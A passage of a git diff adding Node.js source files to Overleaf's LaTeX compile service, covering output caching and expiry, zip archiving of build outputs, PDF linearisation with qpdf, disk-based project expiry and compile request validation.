'archiving log files for project') + fs.mkdir(archiveDir, { recursive: true }, function (err) { + if (err) { + return callback(err) + } + const dirCache = new Set() + dirCache.add(archiveDir) + async.mapSeries( + outputFiles, + function (file, cb) { + const src = Path.join(compileDir, file.path) + const dst = Path.join(archiveDir, file.path) + OutputCacheManager._checkIfShouldArchive( + src, + function (err, shouldArchive) { + if (err) { + return cb(err) + } + if (!shouldArchive) { + return cb() + } + OutputCacheManager._copyFile(src, dst, dirCache, cb) + } + ) + }, + callback + ) + }) + }, + + expireOutputFiles(outputDir, options, callback) { + // look in compileDir for build dirs and delete if > N or age of mod time > T + const cleanupAll = cb => { + fs.rm(outputDir, { force: true, recursive: true }, err => { + if (err) { + return cb(err) + } + // Drop reference after successful cleanup of the output dir. + OLDEST_BUILD_DIR.delete(outputDir) + cb(null) + }) + } + + const cacheRoot = Path.join(outputDir, OutputCacheManager.CACHE_SUBDIR) + fs.readdir(cacheRoot, function (err, results) { + if (err) { + if (err.code === 'ENOENT') { + // cache directory is empty + return cleanupAll(callback) + } + logger.error({ err, projectId: cacheRoot }, 'error clearing cache') + return callback(err) + } + + const dirs = results.sort().reverse() + const currentTime = Date.now() + + let oldestDirTimeToKeep = 0 + + const isExpired = function (dir, index) { + if (options?.keep === dir) { + // This is the directory we just created for the compile request. 
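+          // e.g. (illustrative) options.keep is the buildId just written by
+          // saveOutputFilesInBuildDir, such as '18c3a9f2d10-4f6a...'; it is
+          // pinned here and anchors oldestDirTimeToKeep for the next pass.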
+ oldestDirTimeToKeep = currentTime + return false + } + // remove any directories over the requested (non-null) limit + if (options?.limit != null && index > options.limit) { + return true + } + // remove any directories over the hard limit + if (index > OutputCacheManager.CACHE_LIMIT) { + return true + } + // we can get the build time from the first part of the directory name DDDD-RRRR + // DDDD is date and RRRR is random bytes + const dirTime = parseInt(dir.split('-')[0], 16) + const age = currentTime - dirTime + const expired = age > OutputCacheManager.CACHE_AGE + if (expired) { + return true + } + oldestDirTimeToKeep = dirTime + return false + } + + const toRemove = _.filter(dirs, isExpired) + if (toRemove.length === dirs.length) { + // No builds left after cleanup. + return cleanupAll(callback) + } + + const removeDir = (dir, cb) => + fs.rm( + Path.join(cacheRoot, dir), + { force: true, recursive: true }, + function (err, result) { + logger.debug({ cache: cacheRoot, dir }, 'removed expired cache dir') + if (err) { + logger.error({ err, dir }, 'cache remove error') + } + cb(err, result) + } + ) + async.eachSeries( + toRemove, + (dir, cb) => removeDir(dir, cb), + err => { + if (err) { + // On error: keep the timestamp in the past. + // The next iteration of the cleanup loop will retry the deletion. + return callback(err) + } + // On success: push the timestamp into the future. + OLDEST_BUILD_DIR.set(outputDir, oldestDirTimeToKeep) + callback(null) + } + ) + }) + }, + + _fileIsHidden(path) { + return path?.match(/^\.|\/\./) != null + }, + + _ensureParentExists(dst, dirCache, callback) { + let parent = Path.dirname(dst) + if (dirCache.has(parent)) { + callback() + } else { + fs.mkdir(parent, { recursive: true }, err => { + if (err) return callback(err) + while (!dirCache.has(parent)) { + dirCache.add(parent) + parent = Path.dirname(parent) + } + callback() + }) + } + }, + + _copyFile(src, dst, dirCache, callback) { + OutputCacheManager._ensureParentExists(dst, dirCache, err => { + if (err) { + logger.warn( + { err, dst }, + 'creating parent directory in output cache failed' + ) + return callback(err, false) + } + // copy output file into the cache + fs.copyFile(src, dst, function (err) { + if (err?.code === 'ENOENT') { + logger.warn( + { err, file: src }, + 'file has disappeared when copying to build cache' + ) + callback(err, false) + } else if (err) { + logger.error({ err, src, dst }, 'copy error for file in cache') + callback(err) + } else { + if (Settings.clsi?.optimiseInDocker) { + // don't run any optimisations on the pdf when they are done + // in the docker container + callback() + } else { + // call the optimiser for the file too + OutputFileOptimiser.optimiseFile(src, dst, callback) + } + } + }) + }) + }, + + _checkIfShouldCopy(src, callback) { + callback(null, !Path.basename(src).match(/^strace/)) + }, + + _checkIfShouldArchive(src, callback) { + if (Path.basename(src).match(/^strace/)) { + return callback(null, true) + } + const basename = Path.basename(src) + if ( + Settings.clsi?.archive_logs && + ['output.log', 'output.blg'].includes(basename) + ) { + return callback(null, true) + } + callback(null, false) + }, +} + +OutputCacheManager.promises = { + expireOutputFiles: promisify(OutputCacheManager.expireOutputFiles), + saveOutputFiles: promisify(OutputCacheManager.saveOutputFiles), + saveOutputFilesInBuildDir: promisify( + OutputCacheManager.saveOutputFilesInBuildDir + ), + queueDirOperation, +} diff --git a/services/clsi/app/js/OutputController.js 
b/services/clsi/app/js/OutputController.js new file mode 100644 index 0000000..e5048c4 --- /dev/null +++ b/services/clsi/app/js/OutputController.js @@ -0,0 +1,23 @@ +const OutputFileArchiveManager = require('./OutputFileArchiveManager') +const { expressify } = require('@overleaf/promise-utils') +const { pipeline } = require('node:stream/promises') + +async function createOutputZip(req, res) { + const { + project_id: projectId, + user_id: userId, + build_id: buildId, + } = req.params + + const archive = await OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + + res.attachment('output.zip') + res.setHeader('X-Content-Type-Options', 'nosniff') + await pipeline(archive, res) +} + +module.exports = { createOutputZip: expressify(createOutputZip) } diff --git a/services/clsi/app/js/OutputFileArchiveManager.js b/services/clsi/app/js/OutputFileArchiveManager.js new file mode 100644 index 0000000..64c5198 --- /dev/null +++ b/services/clsi/app/js/OutputFileArchiveManager.js @@ -0,0 +1,113 @@ +const archiver = require('archiver') +const OutputCacheManager = require('./OutputCacheManager') +const OutputFileFinder = require('./OutputFileFinder') +const Settings = require('@overleaf/settings') +const { open } = require('node:fs/promises') +const { NotFoundError } = require('./Errors') +const logger = require('@overleaf/logger') + +// NOTE: Updating this list requires a corresponding change in +// * services/web/frontend/js/features/pdf-preview/util/file-list.ts +const ignoreFiles = ['output.fls', 'output.fdb_latexmk'] + +function getContentDir(projectId, userId) { + let subDir + if (userId != null) { + subDir = `${projectId}-${userId}` + } else { + subDir = projectId + } + return `${Settings.path.outputDir}/${subDir}/` +} + +module.exports = { + async archiveFilesForBuild(projectId, userId, build) { + logger.debug({ projectId, userId, build }, 'Will create zip file') + + const contentDir = getContentDir(projectId, userId) + + const outputFiles = await this._getAllOutputFiles( + contentDir, + projectId, + userId, + build + ) + + const archive = archiver('zip') + + archive.on('error', err => { + logger.warn( + { err, projectId, userId, build }, + 'error emitted when creating output files archive' + ) + }) + + archive.on('warning', err => { + logger.warn( + { err, projectId, userId, build }, + 'warning emitted when creating output files archive' + ) + }) + + const missingFiles = [] + + for (const { path } of outputFiles) { + let fileHandle + try { + fileHandle = await open( + `${contentDir}${OutputCacheManager.path(build, path)}` + ) + } catch (error) { + logger.warn( + { path, error, projectId, userId, build }, + 'error opening file to add to output files archive' + ) + missingFiles.push(path) + continue + } + const fileStream = fileHandle.createReadStream() + archive.append(fileStream, { name: path }) + } + + if (missingFiles.length > 0) { + archive.append(missingFiles.join('\n'), { + name: 'missing_files.txt', + }) + } + + archive.finalize().catch(error => { + logger.error( + { error, projectId, userId, build }, + 'error finalizing output files archive' + ) + }) + + return archive + }, + + async _getAllOutputFiles(contentDir, projectId, userId, build) { + try { + const { outputFiles } = await OutputFileFinder.promises.findOutputFiles( + [], + `${contentDir}${OutputCacheManager.path(build, '.')}` + ) + + return outputFiles.filter( + // Ignore the pdf, clsi-cache tar-ball and also ignore the files ignored by the frontend. 
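+        // e.g. (illustrative): ['output.pdf', 'output.log', 'output.aux',
+        // 'output.fls', 'output.tar.gz'] -> only 'output.log' and
+        // 'output.aux' end up in the zip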
+ ({ path }) => + path !== 'output.pdf' && + path !== 'output.tar.gz' && + !ignoreFiles.includes(path) + ) + } catch (error) { + if ( + error.code === 'ENOENT' || + error.code === 'ENOTDIR' || + error.code === 'EACCES' + ) { + throw new NotFoundError('Output files not found') + } + throw error + } + }, +} diff --git a/services/clsi/app/js/OutputFileFinder.js b/services/clsi/app/js/OutputFileFinder.js new file mode 100644 index 0000000..e62038c --- /dev/null +++ b/services/clsi/app/js/OutputFileFinder.js @@ -0,0 +1,53 @@ +const Path = require('node:path') +const fs = require('node:fs') +const { callbackifyMultiResult } = require('@overleaf/promise-utils') + +async function walkFolder(compileDir, d, files, allEntries) { + const dirents = await fs.promises.readdir(Path.join(compileDir, d), { + withFileTypes: true, + }) + for (const dirent of dirents) { + const p = Path.join(d, dirent.name) + if (dirent.isDirectory()) { + await walkFolder(compileDir, p, files, allEntries) + allEntries.push(p + '/') + } else if (dirent.isFile()) { + files.push(p) + allEntries.push(p) + } else { + allEntries.push(p) + } + } +} + +async function findOutputFiles(resources, directory) { + const files = [] + const allEntries = [] + await walkFolder(directory, '', files, allEntries) + + const incomingResources = new Set(resources.map(resource => resource.path)) + + const outputFiles = [] + for (const path of files) { + if (incomingResources.has(path)) continue + if (path === '.project-sync-state') continue + outputFiles.push({ + path, + type: Path.extname(path).replace(/^\./, '') || undefined, + }) + } + return { + outputFiles, + allEntries, + } +} + +module.exports = { + findOutputFiles: callbackifyMultiResult(findOutputFiles, [ + 'outputFiles', + 'allEntries', + ]), + promises: { + findOutputFiles, + }, +} diff --git a/services/clsi/app/js/OutputFileOptimiser.js b/services/clsi/app/js/OutputFileOptimiser.js new file mode 100644 index 0000000..09ca986 --- /dev/null +++ b/services/clsi/app/js/OutputFileOptimiser.js @@ -0,0 +1,100 @@ +/* eslint-disable + no-return-assign, + no-undef, + no-unused-vars, + n/no-deprecated-api, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
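+// Rough shape of what optimisePDF below does, expressed as shell commands
+// (illustrative; SRC/DST stand for the real paths):
+//   qpdf --linearize --newline-before-endstream SRC DST.opt
+//   mv DST.opt DST    # only when qpdf exits with code 0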
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+let OutputFileOptimiser
+const fs = require('node:fs')
+const Path = require('node:path')
+const { spawn } = require('node:child_process')
+const logger = require('@overleaf/logger')
+const Metrics = require('./Metrics')
+const _ = require('lodash')
+
+module.exports = OutputFileOptimiser = {
+  optimiseFile(src, dst, callback) {
+    // check output file (src) and see if we can optimise it, storing
+    // the result in the build directory (dst)
+    if (callback == null) {
+      callback = function () {}
+    }
+    if (src.match(/\/output\.pdf$/)) {
+      return OutputFileOptimiser.checkIfPDFIsOptimised(
+        src,
+        function (err, isOptimised) {
+          if (err != null || isOptimised) {
+            return callback(null)
+          }
+          return OutputFileOptimiser.optimisePDF(src, dst, callback)
+        }
+      )
+    } else {
+      return callback(null)
+    }
+  },
+
+  checkIfPDFIsOptimised(file, callback) {
+    const SIZE = 16 * 1024 // check the header of the pdf
+    const result = Buffer.alloc(SIZE) // fills with zeroes by default
+    return fs.open(file, 'r', function (err, fd) {
+      if (err != null) {
+        return callback(err)
+      }
+      return fs.read(fd, result, 0, SIZE, 0, (errRead, bytesRead, buffer) =>
+        fs.close(fd, function (errClose) {
+          if (errRead != null) {
+            return callback(errRead)
+          }
+          if (errClose != null) {
+            return callback(errClose)
+          }
+          const isOptimised =
+            buffer.toString('ascii').indexOf('/Linearized 1') >= 0
+          return callback(null, isOptimised)
+        })
+      )
+    })
+  },
+
+  optimisePDF(src, dst, callback) {
+    if (callback == null) {
+      callback = function () {}
+    }
+    const tmpOutput = dst + '.opt'
+    const args = ['--linearize', '--newline-before-endstream', src, tmpOutput]
+    logger.debug({ args }, 'running qpdf command')
+
+    const timer = new Metrics.Timer('qpdf')
+    const proc = spawn('qpdf', args, { stdio: 'ignore' })
+    callback = _.once(callback) // avoid double call back for error and close event
+    proc.on('error', function (err) {
+      logger.warn({ err, args }, 'qpdf failed')
+      return callback(null)
+    }) // ignore the error
+    return proc.on('close', function (code) {
+      timer.done()
+      if (code !== 0) {
+        logger.warn({ code, args }, 'qpdf returned error')
+        return callback(null) // ignore the error
+      }
+      return fs.rename(tmpOutput, dst, function (err) {
+        if (err != null) {
+          logger.warn(
+            { err, tmpOutput, dst },
+            'failed to rename output of qpdf command'
+          )
+        }
+        return callback(null) // ignore the error
+      })
+    })
+  },
+}
diff --git a/services/clsi/app/js/ProjectPersistenceManager.js b/services/clsi/app/js/ProjectPersistenceManager.js
new file mode 100644
index 0000000..e96a459
--- /dev/null
+++ b/services/clsi/app/js/ProjectPersistenceManager.js
@@ -0,0 +1,247 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
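+// Lifecycle sketch (illustrative): markProjectAsJustAccessed() bumps the
+// in-memory LAST_ACCESS timestamp on each compile, and init() schedules a
+// 10-minute sweep that clears anything idle for longer than EXPIRY_TIMEOUT
+// (Settings.project_cache_length_ms, defaulting to 2.5 days):
+//
+//   ProjectPersistenceManager.init()
+//   ProjectPersistenceManager.markProjectAsJustAccessed(projectId, () => {})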
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ProjectPersistenceManager +const UrlCache = require('./UrlCache') +const CompileManager = require('./CompileManager') +const async = require('async') +const logger = require('@overleaf/logger') +const oneDay = 24 * 60 * 60 * 1000 +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { callbackify } = require('node:util') +const Path = require('node:path') +const fs = require('node:fs') + +// projectId -> timestamp mapping. +const LAST_ACCESS = new Map() + +async function collectDiskStats() { + const paths = [ + Settings.path.compilesDir, + Settings.path.outputDir, + Settings.path.clsiCacheDir, + ] + + const diskStats = {} + for (const path of paths) { + try { + const { blocks, bavail, bsize } = await fs.promises.statfs(path) + const stats = { + // Warning: these values will be wrong by a factor in Docker-for-Mac. + // See https://github.com/docker/for-mac/issues/2136 + total: blocks * bsize, // Total size of the file system in bytes + available: bavail * bsize, // Free space available to unprivileged users. + } + const diskAvailablePercent = (stats.available / stats.total) * 100 + Metrics.gauge('disk_available_percent', diskAvailablePercent, 1, { + path, + }) + const lowDisk = diskAvailablePercent < 10 + diskStats[path] = { stats, lowDisk } + } catch (err) { + logger.err({ err, path }, 'error getting disk usage') + } + } + return diskStats +} + +async function refreshExpiryTimeout() { + for (const [path, { stats, lowDisk }] of Object.entries( + await collectDiskStats() + )) { + const lowerExpiry = ProjectPersistenceManager.EXPIRY_TIMEOUT * 0.9 + if (lowDisk && Settings.project_cache_length_ms / 2 < lowerExpiry) { + logger.warn( + { + path, + stats, + newExpiryTimeoutInDays: (lowerExpiry / oneDay).toFixed(2), + }, + 'disk running low on space, modifying EXPIRY_TIMEOUT' + ) + ProjectPersistenceManager.EXPIRY_TIMEOUT = lowerExpiry + break + } + } +} + +module.exports = ProjectPersistenceManager = { + EXPIRY_TIMEOUT: Settings.project_cache_length_ms || oneDay * 2.5, + + promises: { + refreshExpiryTimeout, + }, + + refreshExpiryTimeout: callbackify(refreshExpiryTimeout), + + init() { + fs.readdir(Settings.path.compilesDir, (err, dirs) => { + if (err) { + logger.warn({ err }, 'cannot get project listing') + dirs = [] + } + + async.eachLimit( + dirs, + 10, + (projectAndUserId, cb) => { + const compileDir = Path.join( + Settings.path.compilesDir, + projectAndUserId + ) + const projectId = projectAndUserId.slice(0, 24) + fs.stat(compileDir, (err, stats) => { + if (err) { + // Schedule for immediate cleanup + LAST_ACCESS.set(projectId, 0) + } else { + // Cleanup eventually. + LAST_ACCESS.set(projectId, stats.mtime.getTime()) + } + cb() + }) + }, + () => { + setInterval( + () => { + ProjectPersistenceManager.refreshExpiryTimeout(() => { + ProjectPersistenceManager.clearExpiredProjects(err => { + if (err) { + logger.error({ err }, 'clearing expired projects failed') + } + }) + }) + }, + 10 * 60 * 1000 + ) + } + ) + }) + + // Collect disk stats frequently to have them ready the next time /metrics is scraped (60s +- jitter). 
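+    // Worked example for collectDiskStats() (illustrative numbers): statfs
+    // reporting blocks = 25e6, bsize = 4096, bavail = 5e6 gives
+    // total ~= 102 GB, available ~= 20 GB, disk_available_percent = 20,
+    // comfortably above the lowDisk threshold of 10.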
+ setInterval(() => { + collectDiskStats().catch(err => { + logger.err({ err }, 'low level error collecting disk stats') + }) + }, 50_000) + }, + + markProjectAsJustAccessed(projectId, callback) { + LAST_ACCESS.set(projectId, Date.now()) + callback() + }, + + clearExpiredProjects(callback) { + if (callback == null) { + callback = function () {} + } + return ProjectPersistenceManager._findExpiredProjectIds( + function (error, projectIds) { + if (error != null) { + return callback(error) + } + logger.debug({ projectIds }, 'clearing expired projects') + const jobs = Array.from(projectIds || []).map(projectId => + ( + projectId => callback => + ProjectPersistenceManager.clearProjectFromCache( + projectId, + { reason: 'expired' }, + function (err) { + if (err != null) { + logger.error({ err, projectId }, 'error clearing project') + } + return callback() + } + ) + )(projectId) + ) + return async.series(jobs, function (error) { + if (error != null) { + return callback(error) + } + return CompileManager.clearExpiredProjects( + ProjectPersistenceManager.EXPIRY_TIMEOUT, + error => callback(error) + ) + }) + } + ) + }, // ignore any errors from deleting directories + + clearProject(projectId, userId, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug({ projectId, userId }, 'clearing project for user') + return CompileManager.clearProject(projectId, userId, function (error) { + if (error != null) { + return callback(error) + } + return ProjectPersistenceManager.clearProjectFromCache( + projectId, + { reason: 'cleared' }, + function (error) { + if (error != null) { + return callback(error) + } + return callback() + } + ) + }) + }, + + clearProjectFromCache(projectId, options, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug({ projectId }, 'clearing project from cache') + return UrlCache.clearProject(projectId, options, function (error) { + if (error != null) { + logger.err({ error, projectId }, 'error clearing project from cache') + return callback(error) + } + return ProjectPersistenceManager._clearProjectFromDatabase( + projectId, + function (error) { + if (error != null) { + logger.err( + { error, projectId }, + 'error clearing project from database' + ) + } + return callback(error) + } + ) + }) + }, + + _clearProjectFromDatabase(projectId, callback) { + LAST_ACCESS.delete(projectId) + callback() + }, + + _findExpiredProjectIds(callback) { + const expiredFrom = Date.now() - ProjectPersistenceManager.EXPIRY_TIMEOUT + const expiredProjectsIds = [] + for (const [projectId, lastAccess] of LAST_ACCESS.entries()) { + if (lastAccess < expiredFrom) { + expiredProjectsIds.push(projectId) + } + } + // ^ may be a fairly busy loop, continue detached. 
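+    // Deferring with setTimeout(..., 0) yields to the event loop before the
+    // cleanup triggered by the callback begins, so pending I/O gets a turn
+    // after the synchronous scan above (a sketch of the intent).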
+ setTimeout(() => callback(null, expiredProjectsIds), 0) + }, +} + +logger.debug( + { EXPIRY_TIMEOUT: ProjectPersistenceManager.EXPIRY_TIMEOUT }, + 'project assets kept timeout' +) diff --git a/services/clsi/app/js/RequestParser.js b/services/clsi/app/js/RequestParser.js new file mode 100644 index 0000000..4e9d722 --- /dev/null +++ b/services/clsi/app/js/RequestParser.js @@ -0,0 +1,250 @@ +const settings = require('@overleaf/settings') +const OutputCacheManager = require('./OutputCacheManager') + +const VALID_COMPILERS = ['pdflatex', 'latex', 'xelatex', 'lualatex'] +const MAX_TIMEOUT = 600 +const EDITOR_ID_REGEX = /^[a-f0-9-]{36}$/ // UUID + +function parse(body, callback) { + const response = {} + + if (body.compile == null) { + return callback( + new Error('top level object should have a compile attribute') + ) + } + + const { compile } = body + if (!compile.options) { + compile.options = {} + } + + try { + response.metricsOpts = { + path: _parseAttribute('metricsPath', compile.options.metricsPath, { + default: '', + type: 'string', + }), + method: _parseAttribute('metricsMethod', compile.options.metricsMethod, { + default: '', + type: 'string', + }), + // Will be populated later. Must always be populated for prom library. + compile: 'initial', + } + response.compiler = _parseAttribute('compiler', compile.options.compiler, { + validValues: VALID_COMPILERS, + default: 'pdflatex', + type: 'string', + }) + response.compileFromClsiCache = _parseAttribute( + 'compileFromClsiCache', + compile.options.compileFromClsiCache, + { default: false, type: 'boolean' } + ) + response.populateClsiCache = _parseAttribute( + 'populateClsiCache', + compile.options.populateClsiCache, + { default: false, type: 'boolean' } + ) + response.enablePdfCaching = _parseAttribute( + 'enablePdfCaching', + compile.options.enablePdfCaching, + { + default: false, + type: 'boolean', + } + ) + response.pdfCachingMinChunkSize = _parseAttribute( + 'pdfCachingMinChunkSize', + compile.options.pdfCachingMinChunkSize, + { + default: settings.pdfCachingMinChunkSize, + type: 'number', + } + ) + response.timeout = _parseAttribute('timeout', compile.options.timeout, { + default: MAX_TIMEOUT, + type: 'number', + }) + response.imageName = _parseAttribute( + 'imageName', + compile.options.imageName, + { + type: 'string', + validValues: + settings.clsi && + settings.clsi.docker && + settings.clsi.docker.allowedImages, + } + ) + response.draft = _parseAttribute('draft', compile.options.draft, { + default: false, + type: 'boolean', + }) + response.stopOnFirstError = _parseAttribute( + 'stopOnFirstError', + compile.options.stopOnFirstError, + { + default: false, + type: 'boolean', + } + ) + response.check = _parseAttribute('check', compile.options.check, { + type: 'string', + }) + response.flags = _parseAttribute('flags', compile.options.flags, { + default: [], + type: 'object', + }) + if (settings.allowedCompileGroups) { + response.compileGroup = _parseAttribute( + 'compileGroup', + compile.options.compileGroup, + { + validValues: settings.allowedCompileGroups, + default: '', + type: 'string', + } + ) + } + // The syncType specifies whether the request contains all + // resources (full) or only those resources to be updated + // in-place (incremental). 
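+    //
+    // e.g. the first compile of a project sends syncType "full" together
+    // with every resource; later compiles may send "incremental" plus only
+    // the changed resources, provided the syncState below still matches the
+    // stored value (see ResourceStateManager).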
+ response.syncType = _parseAttribute('syncType', compile.options.syncType, { + validValues: ['full', 'incremental'], + type: 'string', + }) + + // The syncState is an identifier passed in with the request + // which has the property that it changes when any resource is + // added, deleted, moved or renamed. + // + // on syncType full the syncState identifier is passed in and + // stored + // + // on syncType incremental the syncState identifier must match + // the stored value + response.syncState = _parseAttribute( + 'syncState', + compile.options.syncState, + { type: 'string' } + ) + + if (response.timeout > MAX_TIMEOUT) { + response.timeout = MAX_TIMEOUT + } + response.timeout = response.timeout * 1000 // milliseconds + + response.resources = (compile.resources || []).map(resource => + _parseResource(resource) + ) + + const rootResourcePath = _parseAttribute( + 'rootResourcePath', + compile.rootResourcePath, + { + default: 'main.tex', + type: 'string', + } + ) + response.rootResourcePath = _checkPath(rootResourcePath) + + response.editorId = _parseAttribute('editorId', compile.options.editorId, { + type: 'string', + regex: EDITOR_ID_REGEX, + }) + response.buildId = _parseAttribute('buildId', compile.options.buildId, { + type: 'string', + regex: OutputCacheManager.BUILD_REGEX, + }) + } catch (error1) { + const error = error1 + return callback(error) + } + + callback(null, response) +} + +function _parseResource(resource) { + let modified + if (resource.path == null || typeof resource.path !== 'string') { + throw new Error('all resources should have a path attribute') + } + + if (resource.modified != null) { + modified = new Date(resource.modified) + if (isNaN(modified.getTime())) { + throw new Error( + `resource modified date could not be understood: ${resource.modified}` + ) + } + } + + if (resource.url == null && resource.content == null) { + throw new Error( + 'all resources should have either a url or content attribute' + ) + } + if (resource.content != null && typeof resource.content !== 'string') { + throw new Error('content attribute should be a string') + } + if (resource.url != null && typeof resource.url !== 'string') { + throw new Error('url attribute should be a string') + } + if (resource.fallbackURL && typeof resource.fallbackURL !== 'string') { + throw new Error('fallbackURL attribute should be a string') + } + + return { + path: resource.path, + modified, + url: resource.url, + fallbackURL: resource.fallbackURL, + content: resource.content, + } +} + +function _parseAttribute(name, attribute, options) { + if (attribute != null) { + if (options.validValues != null) { + if (options.validValues.indexOf(attribute) === -1) { + throw new Error( + `${name} attribute should be one of: ${options.validValues.join( + ', ' + )}` + ) + } + } + if (options.type != null) { + // eslint-disable-next-line valid-typeof + if (typeof attribute !== options.type) { + throw new Error(`${name} attribute should be a ${options.type}`) + } + } + if (options.type === 'string' && options.regex instanceof RegExp) { + if (!options.regex.test(attribute)) { + throw new Error( + `${name} attribute does not match regex ${options.regex}` + ) + } + } + } else { + if (options.default != null) { + return options.default + } + } + return attribute +} + +function _checkPath(path) { + // check that the request does not use a relative path + for (const dir of Array.from(path.split('/'))) { + if (dir === '..') { + throw new Error('relative path in root resource') + } + } + return path +} + +module.exports = { parse, 
MAX_TIMEOUT }
diff --git a/services/clsi/app/js/ResourceStateManager.js b/services/clsi/app/js/ResourceStateManager.js
new file mode 100644
index 0000000..a5f747e
--- /dev/null
+++ b/services/clsi/app/js/ResourceStateManager.js
@@ -0,0 +1,116 @@
+const Path = require('node:path')
+const fs = require('node:fs')
+const logger = require('@overleaf/logger')
+const Errors = require('./Errors')
+const SafeReader = require('./SafeReader')
+
+module.exports = {
+  // The sync state is an identifier which must match for an
+  // incremental update to be allowed.
+  //
+  // The initial value is passed in and stored on a full
+  // compile, along with the list of resources.
+  //
+  // Subsequent incremental compiles must come with the same value - if
+  // not they will be rejected with a 409 Conflict response. The
+  // previous list of resources is returned.
+  //
+  // An incremental compile can only update existing files with new
+  // content. The sync state identifier must change if any docs or
+  // files are moved, added, deleted or renamed.
+
+  SYNC_STATE_FILE: '.project-sync-state',
+  SYNC_STATE_MAX_SIZE: 128 * 1024,
+
+  saveProjectState(state, resources, basePath, callback) {
+    const stateFile = Path.join(basePath, this.SYNC_STATE_FILE)
+    if (state == null) {
+      // remove the file if no state passed in
+      logger.debug({ state, basePath }, 'clearing sync state')
+      fs.unlink(stateFile, function (err) {
+        if (err && err.code !== 'ENOENT') {
+          return callback(err)
+        } else {
+          return callback()
+        }
+      })
+    } else {
+      logger.debug({ state, basePath }, 'writing sync state')
+      const resourceList = resources.map(resource => resource.path)
+      fs.writeFile(
+        stateFile,
+        [...resourceList, `stateHash:${state}`].join('\n'),
+        callback
+      )
+    }
+  },
+
+  checkProjectStateMatches(state, basePath, callback) {
+    const stateFile = Path.join(basePath, this.SYNC_STATE_FILE)
+    const size = this.SYNC_STATE_MAX_SIZE
+    SafeReader.readFile(
+      stateFile,
+      size,
+      'utf8',
+      function (err, result, bytesRead) {
+        if (err) {
+          return callback(err)
+        }
+        if (bytesRead === size) {
+          logger.error(
+            { file: stateFile, size, bytesRead },
+            'project state file truncated'
+          )
+        }
+        const array = result ?
result.toString().split('\n') : [] + const adjustedLength = Math.max(array.length, 1) + const resourceList = array.slice(0, adjustedLength - 1) + const oldState = array[adjustedLength - 1] + const newState = `stateHash:${state}` + logger.debug( + { state, oldState, basePath, stateMatches: newState === oldState }, + 'checking sync state' + ) + if (newState !== oldState) { + return callback( + new Errors.FilesOutOfSyncError( + 'invalid state for incremental update' + ) + ) + } else { + const resources = resourceList.map(path => ({ path })) + callback(null, resources) + } + } + ) + }, + + checkResourceFiles(resources, allFiles, basePath, callback) { + // check the paths are all relative to current directory + const containsRelativePath = resource => { + const dirs = resource.path.split('/') + return dirs.indexOf('..') !== -1 + } + if (resources.some(containsRelativePath)) { + return callback(new Error('relative path in resource file list')) + } + // check if any of the input files are not present in list of files + const seenFiles = new Set(allFiles) + const missingFiles = resources + .map(resource => resource.path) + .filter(path => !seenFiles.has(path)) + if (missingFiles.length > 0) { + logger.err( + { missingFiles, basePath, allFiles, resources }, + 'missing input files for project' + ) + return callback( + new Errors.FilesOutOfSyncError( + 'resource files missing in incremental update' + ) + ) + } else { + callback() + } + }, +} diff --git a/services/clsi/app/js/ResourceWriter.js b/services/clsi/app/js/ResourceWriter.js new file mode 100644 index 0000000..bf88538 --- /dev/null +++ b/services/clsi/app/js/ResourceWriter.js @@ -0,0 +1,384 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, + no-useless-escape, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
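+//
+// ResourceWriter materialises a compile request on disk: a full sync writes
+// every resource from scratch, while an incremental sync first verifies the
+// stored sync state (see ResourceStateManager) and then rewrites only the
+// resources sent with the request, clearing extraneous output files from the
+// previous compile along the way.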
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ResourceWriter +const { promisify } = require('node:util') +const UrlCache = require('./UrlCache') +const Path = require('node:path') +const fs = require('node:fs') +const async = require('async') +const OutputFileFinder = require('./OutputFileFinder') +const ResourceStateManager = require('./ResourceStateManager') +const Metrics = require('./Metrics') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') + +const parallelFileDownloads = settings.parallelFileDownloads || 1 + +module.exports = ResourceWriter = { + syncResourcesToDisk(request, basePath, callback) { + if (callback == null) { + callback = function () {} + } + if (request.syncType === 'incremental') { + logger.debug( + { projectId: request.project_id, userId: request.user_id }, + 'incremental sync' + ) + return ResourceStateManager.checkProjectStateMatches( + request.syncState, + basePath, + function (error, resourceList) { + if (error != null) { + return callback(error) + } + return ResourceWriter._removeExtraneousFiles( + request, + resourceList, + basePath, + function (error, outputFiles, allFiles) { + if (error != null) { + return callback(error) + } + return ResourceStateManager.checkResourceFiles( + resourceList, + allFiles, + basePath, + function (error) { + if (error != null) { + return callback(error) + } + return ResourceWriter.saveIncrementalResourcesToDisk( + request.project_id, + request.resources, + basePath, + function (error) { + if (error != null) { + return callback(error) + } + return callback(null, resourceList) + } + ) + } + ) + } + ) + } + ) + } + logger.debug( + { projectId: request.project_id, userId: request.user_id }, + 'full sync' + ) + UrlCache.createProjectDir(request.project_id, error => { + if (error != null) { + return callback(error) + } + ResourceWriter.saveAllResourcesToDisk( + request, + basePath, + function (error) { + if (error != null) { + return callback(error) + } + return ResourceStateManager.saveProjectState( + request.syncState, + request.resources, + basePath, + function (error) { + if (error != null) { + return callback(error) + } + return callback(null, request.resources) + } + ) + } + ) + }) + }, + + saveIncrementalResourcesToDisk(projectId, resources, basePath, callback) { + if (callback == null) { + callback = function () {} + } + return ResourceWriter._createDirectory(basePath, error => { + if (error != null) { + return callback(error) + } + const jobs = Array.from(resources).map(resource => + (resource => { + return callback => + ResourceWriter._writeResourceToDisk( + projectId, + resource, + basePath, + callback + ) 